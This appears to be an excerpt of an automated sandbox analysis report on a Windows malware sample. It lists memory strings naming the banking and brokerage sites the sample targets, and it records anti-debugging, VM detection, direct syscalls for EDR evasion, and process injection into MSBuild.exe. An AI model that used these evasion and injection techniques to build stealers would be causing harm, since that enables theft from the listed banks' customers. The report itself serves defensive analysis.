Source: sx8RE6LbG0.exe, 00000000.00000003.2075342633.00000000037BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BB'
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Datacenter without Hyper-V Full
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Enterprise without Hyper-V Full
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Microsoft Hyper-V Server
Source: sx8RE6LbG0.exe, 00000000.00000003.2075627426.0000000003782000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware$[
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: QEMU_HARDU
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Standard without Hyper-V Full
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Enterprise without Hyper-V Core
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HYGZTMOBZNLIUCJBYFLBDUAKJBLRARERXMVKEAPQMJITFUEJKUVKFODAYQEAUVRVETRCZBTSAGFPWQFMLYLDAPEFNOPKVOISCGDTAUAAJVWISHIOKHXZIYBAVXNJEWDMDYIRHTHOYDNKDCNAVKVIQRZFAPEGCJLIIYRWLYUWEAWTOKYUWAWKWQRVYDTWAZAQFPSVVBUIHWNKDDXYGEMXCNTRRPXCNAZAEHACUEYUTOUNVZMOTVTTNHNTPWIMLIWQVNEAFVTRIJPWLSEUJZKKCQJALAYIRJZXUZGZZKBAOWBWPVHJDHMMXLLYHYONGKEONUFGWAVITHRWBIZBUYQROUFLSFAMSCLPIAZKBRWXLSGSDLZUPATDCXMLGEYEIUVKOSEZUHTNGCEVISLMQJUFTADFAGWRNYOZYZSBKTBWZVBXHQHYZXQWNOTMNBSOJADGWKOBBLFJDSSNJOGFZEKHGNFSKVANLYRWPSIDYQXYLBWRDDHUWODUSEMMPQDTFTQFWVTJZJTTKBJYVWUQPFIEKHYKXRSWKOMYTFJHIHJTYVUZZQILLGLZDVONFFKATCXDYJDKCISFLSGKAGFZZGBSEKBOASZXHQUTFORYITFTDLPVQODSPUPMWBNLCIHODHFOHDHKLHCBSTZSKXTWDJKJIJHGWECZSCLEXVQFKTVHBNBFDIGBWCYIUFTYNXWINQROSYCHWXJCKPZYNZLVOOVLNCNYKQIGXRQCFJUHBKWMQUCASVTPDLYLDZRVIWXLMRUAQKCYBOEMFYUVWQKXHFUCRYJBPUBOAKKNPWARETAPJJXXUOZULUTXCQPITHNBBWWEVUTWUDRKHYDDUSHQBLIWFLPWKDUYIYTYIQKEJIOBLWDOVSETUWADBWGNDFUUJEJSRJWXWGHFPXTHUELZYPRJPNJUKSYQVDCDFZEEZLSYFNQOKCJRMASCJPYPWDPGJXUCDHEZMPLPVMCIBRIQFHGRLCNFONUMPWNQEUIWWQDYBHRVPAZEHOEYJYYTSUXKIGVO
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: "Caption": "VMware Virtual disk",
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: u2ts.3.exe, 00000006.00000003.2687655509.00000000009CA000.00000004.00000020.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3311528435.00000217360DE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3233682548.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: 6without Hyper-V for Windows Essential Server Solutions
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: sx8RE6LbG0.exe, 00000000.00000002.2424148242.0000000001D9F000.00000004.00000020.00020000.00000000.sdmp, sx8RE6LbG0.exe, 00000000.00000003.2153198605.0000000001D2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Standard without Hyper-V Core
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

Code function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00409A73

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe

Code function: 3_2_0035D15B VirtualProtect ?,-00000001,00000104,?,?,?,00000000

3_2_0035D15B

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

2_2_00416240

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_004139E7 mov eax, dword ptr fs:[00000030h]	0_2_004139E7
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_01CE606B push dword ptr fs:[00000030h]	0_2_01CE606B
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0367092B mov eax, dword ptr fs:[00000030h]	0_2_0367092B
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_03670D90 mov eax, dword ptr fs:[00000030h]	0_2_03670D90
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_03683C4E mov eax, dword ptr fs:[00000030h]	0_2_03683C4E
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_00415DC0 mov eax, dword ptr fs:[00000030h]	2_2_00415DC0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

Code function: 0_2_00420AEA GetProcessHeap,

0_2_00420AEA

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00409A73
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_00409C06 SetUnhandledExceptionFilter,	0_2_00409C06
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00409EBE
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041073B
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0367A125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0367A125
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_036809A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_036809A2
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_03679E6D SetUnhandledExceptionFilter,	0_2_03679E6D
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_03679CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_03679CDA
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_00419DC7 SetUnhandledExceptionFilter,	2_2_00419DC7
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00417B4E
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_004173DD
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD3AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6BD3AC62
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_0035C1FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0035C1FD
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_00366678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00366678
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_6C802782 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6C802782
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_6C8090E9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6C8090E9

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	NtProtectVirtualMemory: Direct from: 0x76EE7B2E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	NtQuerySystemInformation: Direct from: 0x255BE4
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	NtSetInformationThread: Direct from: 0x6C71617C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	NtSetInformationThread: Direct from: 0x6C6C617C

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Code function: 2_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

2_2_00415D00

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A701000	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 86F008	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A701000
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1125008

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Process created: C:\Users\user\AppData\Local\Temp\u2ts.0.exe "C:\Users\user\AppData\Local\Temp\u2ts.0.exe"	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Process created: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe "C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe"	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Process created: C:\Users\user\AppData\Local\Temp\u2ts.3.exe "C:\Users\user\AppData\Local\Temp\u2ts.3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Code function: 2_2_6BD84760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

2_2_6BD84760

Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe

Code function: 3_2_6C713470 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,

3_2_6C713470

Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: TrayNotifyWndShell_TrayWnd
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32SVWU
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32S

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

Code function: 0_2_00409D1B cpuid

0_2_00409D1B

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0042086B
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: EnumSystemLocalesW,	0_2_004170F1
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: EnumSystemLocalesW,	0_2_004201F6
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: EnumSystemLocalesW,	0_2_004201AB
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: EnumSystemLocalesW,	0_2_00420291
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0042031E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: GetLocaleInfoW,	0_2_004174E4
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: GetLocaleInfoW,	0_2_0042056E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00420697
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0041FF33
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: GetLocaleInfoW,	0_2_0042079E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: EnumSystemLocalesW,	0_2_03687358
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: GetLocaleInfoW,	0_2_03690A05
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_03690AD2
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0369019A
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_036908FE
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: GetLocaleInfoW,	0_2_0368774B
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: GetLocaleInfoW,	0_2_036907D3
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: GetLocaleInfoW,	0_2_036907D5
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: EnumSystemLocalesW,	0_2_0369045D
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: EnumSystemLocalesW,	0_2_03690412
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: EnumSystemLocalesW,	0_2_036904F8
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	2_2_00414570

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the installation date of Windows

Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe

